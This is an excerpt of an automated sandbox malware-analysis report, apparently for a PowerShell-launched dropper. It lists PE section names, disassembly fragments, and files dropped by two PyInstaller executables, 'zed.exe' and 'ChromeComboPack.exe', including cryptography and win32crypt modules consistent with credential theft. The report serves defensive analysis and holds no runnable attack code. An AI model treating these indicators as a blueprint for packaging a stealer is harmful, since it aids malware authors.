Source: libcrypto-3.dll.7.dr	Static PE information: section name: .00cfg
Source: python312.dll.7.dr	Static PE information: section name: PyRuntim
Source: zlib1.dll.7.dr	Static PE information: section name: .xdata
Source: VCRUNTIME140.dll.7.dr	Static PE information: section name: fothk
Source: VCRUNTIME140.dll.7.dr	Static PE information: section name: _RDATA

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD343AD2A5 pushad ; iretd	0_2_00007FFD343AD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344C7261 push ebx; iretd	0_2_00007FFD344C756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344D4C7E push esp; retf	0_2_00007FFD344D4C7F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344C0952 push E95ABED0h; ret	0_2_00007FFD344C09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD344C9AC8 push E85D9322h; ret	0_2_00007FFD344C9BF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34596E04 push ss; iretd	0_2_00007FFD34596E07
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34840EEA push eax; iretd	0_2_00007FFD34840EEB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34847A06 push ss; ret	0_2_00007FFD34847A07

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe			Jump to dropped file

Found pyInstaller with non standard icon

Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe

Process created: "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"

Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\select.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\python312.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\zlib1.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\charset_normalizer\md__mypyc.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\python3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\charset_normalizer\md.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\tk86t.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ec_ws.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_asyncio.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_blowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_x25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_RIPEMD160.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_curve448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\tcl86t.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\python312.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\win32\win32crypt.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\PublicKey\_ed448.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cast.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_BLAKE2b.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA384.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\python3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_pkcs1_decode.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\python3.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA224.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_SHA512.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_MD4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_des.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\tk86t.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Hash\_keccak.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Math\_modexp.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_chacha20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_wmi.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\PublicKey\_ed25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_poly1305.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_des3.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_raw_arc2.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_ARC4.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\PublicKey\_curve25519.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI17802\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\_cffi_backend.cp312-win_amd64.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI22602\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\VCRUNTIME140_1.dll	Jump to dropped file
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI13362\_lzma.pyd	Jump to dropped file
